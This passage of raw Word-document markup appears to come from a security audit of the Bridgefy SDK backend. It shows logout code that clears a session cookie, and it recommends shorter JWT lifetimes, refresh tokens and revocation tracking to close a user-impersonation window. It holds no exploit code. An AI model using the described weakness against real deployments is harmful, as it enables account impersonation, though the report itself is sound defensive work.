        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDtoLogoutDashIn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>): Promise&lt;IDtoLogoutDashOut&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>params.tokenId = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>req.tokenId;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>params.userRequest = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>req.userBF;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ucAuthDash.execLogoutDash(params)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.httpContext.response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>clearCookie(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'bfSDKSession'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cookieOptions);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Session closed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>successfully'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/src/core/dashboard/usecases/uc-auth-dash.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1115" w:right="2170" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>execLogoutDash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ILogoutDashIn):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Promise&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>profile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>await this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.bndProfileRead.getByClientId(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.userRequest.clientId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(!profile) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.bndProfileCud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>saveLogoutData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(profile.id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="65"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to shorten the expiration time of JWT tokens from 7 days to 5 minutes. This keeps the stateless implementation while substantially reducing the possible attack window for user impersonation. For mobile applications, a long-lasting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>refresh </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>token could be introduced, but this should be stored in the Android KeyStore or iOS Keychain. The mobile front-end can then refresh the short-lived JWT token using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>refresh </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>token, and thus forcing an update on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cached</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>well as preventing users from having to login constantly. Additionally, privileged endpoints ought to validate user-permissions on every request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="368" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Once all this is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>done,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>considered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>revoked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JWT tokens on the server side. Although this would defeat the stateless nature of JWT, it would effectively eliminate this attack vector. Alternatively, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Token Sidejacking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protection feature could be implemented for better protection while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>keeping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tokens fully stateless. For additional background and mitigation guidance to accomplish this, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Token Sidejacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>No Built-In Token Revocation by the User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
